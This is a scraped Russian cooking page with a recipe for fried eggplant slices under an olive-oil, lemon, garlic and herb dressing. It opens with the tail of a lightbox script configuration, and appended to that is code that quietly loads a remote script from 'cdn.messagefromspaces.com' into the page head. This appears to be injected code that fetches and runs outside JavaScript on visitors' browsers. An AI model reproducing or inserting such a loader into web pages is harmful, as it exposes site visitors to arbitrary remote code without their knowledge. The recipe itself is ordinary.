, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Вкусно + Полезно

Баклажаны с острым соусом


baklazhani

Баклажан — это один из уникальных овощей: он хорош в любом блюде! Как вариант, попробуйте вот это.

 

Что и сколько берем:

1. Баклажан — 1 шт.

2. Масло оливковое — полстакана

3. Сок лимона — 1-2 ч.л.

4. Укроп/петрушка/кинза/зеленый лук

5. Чеснок — 2-3 зубка

5. Соль и перец по вкусу

 

Начинаем готовить:

Режем баклажан пополам вдоль. Затем еще пополам поперек и нарезаем пластиночками по 5-7 мм. Обжариваем пластинки на сковороде, не забывая, что баклажаны любят масло. (Потом просто выложим на салфеточку и излишки масла уйдут).  Выкладываем обжаренные баклажаны на плоскую тарелку в один слой. Теперь готовим «верхушку». В оливковое масло добавляем сок лимона, соль, перец, мелко нарезанную зелень, мелко порубленный чеснок. Консистенция всего этого должна быть такой, чтобы можно было легко распределить по тарелочке. Распределяем и едим. Блюдо довольно острое и можно сделать вариант поспокойнее: просто положить каждую дольку баклажана на тостик белого хлеба с адыгейским сыром.

На эту тему вы можете почитать:

Салатик по-русски
Салат из цукини
Теплый салат из овощей

Тэги: ,



Добавить комментарий